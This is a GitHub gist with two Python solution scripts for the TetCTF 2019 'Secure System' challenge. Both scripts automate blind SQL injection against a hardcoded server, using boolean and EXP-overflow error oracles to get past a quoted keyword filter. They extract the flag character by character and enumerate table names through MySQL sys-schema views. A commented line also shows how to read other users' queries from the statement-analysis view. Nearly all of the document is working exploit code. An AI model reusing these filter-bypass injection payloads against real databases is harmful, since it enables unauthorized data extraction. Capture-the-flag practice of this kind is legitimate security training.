-
-
Save terjanq/64f6f97f86e3137f5281cea75bbf0148 to your computer and use it in GitHub Desktop.
Solution to Secure System - TetCTF 2019
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
sess = requests.Session() | |
URL = 'http://45.77.240.178:8002' | |
payload = '''((SELECT 1,CONCAT({flag}, CAST("0" as JSON))) <= (SELECT * FROM `Th1z_Fack1n_Fl4444g_Tabl3`))+1''' | |
def try_payload(payload): | |
r = sess.post(URL, data={'id':payload}) | |
return 'Hello guest' not in r.text | |
ASCIIAlphabet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz}" | |
flag2 = 'TETCTF{0WL_D0NKEY_MEANS_LIARRRRRRR}' | |
flag = 'TetCTF{0wl_d0nkey_m' | |
last_c = '' | |
while True: | |
for c in ASCIIAlphabet: | |
# print('try: %s' %c) | |
t = flag + c | |
t = '0x'+t.encode('hex') | |
if try_payload(payload.format(flag=t)): | |
flag += last_c | |
print(flag) | |
last_c = '' | |
break | |
last_c = c |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests, urllib, re, sys | |
sess = requests.Session() | |
fancy_console = False | |
URL = 'http://45.77.240.178:8002' | |
payload = '''EXP( | |
(CONV( | |
HEX( | |
SUBSTR({variable},@wOFFSET@,1) | |
),16,10 | |
)<=@cORD@) | |
*1111)+1''' | |
ASCIIAlphabet = "\001 !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~" | |
simpleAlphabet = "\001abcdefghijklmnopqrstuvwxyz" | |
HEXAlphabet = "\0010123456789abcdef" | |
advancedAlphabet= "\0010123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz" | |
def gen_payload(variable): | |
p = payload.format(variable=variable) | |
return re.sub(r'\s+', ' ', p) | |
def check_char(id): | |
pass | |
def printInPlace(alert): | |
if fancy_console: | |
sys.stdout.write("{}{}".format(alert, "\b"*len(alert))) | |
sys.stdout.flush() | |
return fancy_console | |
def tryPayload(payload): | |
r = sess.post(URL, data={'id':payload}) | |
return 'Hello guest' in r.text | |
#bin-search ASCII inside [alphabet] | |
def findName(payload, alphabet): | |
a = 0 | |
b = len(alphabet)-1 | |
while (a < b): | |
mid = (a+b)//2 | |
c = alphabet[mid] | |
printInPlace(c) | |
if tryPayload(payload | |
.replace("@cORD@", str(ord(c))) | |
): a = mid + 1 | |
else: | |
b = mid | |
return alphabet[a] | |
def findNames(payload, alphabet): | |
for result_offset in range(0, 10): | |
result = "" | |
pl = payload.replace("@rOFFSET@", str(result_offset)) | |
for word_offset in range(1, 200): | |
pl2 = pl.replace("@wOFFSET@", str(word_offset)) | |
c = findName(pl2, alphabet) | |
# print(c) | |
if c == alphabet[0]: break | |
print(c, end='') | |
sys.stdout.flush() | |
# sys.stdout.write(c) | |
# sys.stdout.flush | |
result+=c | |
print(" ") | |
if len(result) <= 1: break | |
return | |
# filter | |
# preg_match('/and|or|in|if|case|sleep|benchmark/is' , $_POST['id']) | |
# preg_match('/order.+?by|union.+?select/is' , $_POST['id']) | |
# Th1z_Fack1n_Fl4444g_Tabl3 | |
findNames(gen_payload('''(select table_name from sys.x$schema_flattened_keys LIMIT @rOFFSET@, 1)'''), advancedAlphabet) | |
# retrieve others' solutions | |
# findNames(gen_payload('''(select query from sys.`x$statement_analysis` where query like '%Th1z_Fack1n_Fl4444g_Tabl3%' LIMIT @rOFFSET@, 1)'''), ASCIIAlphabet) | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment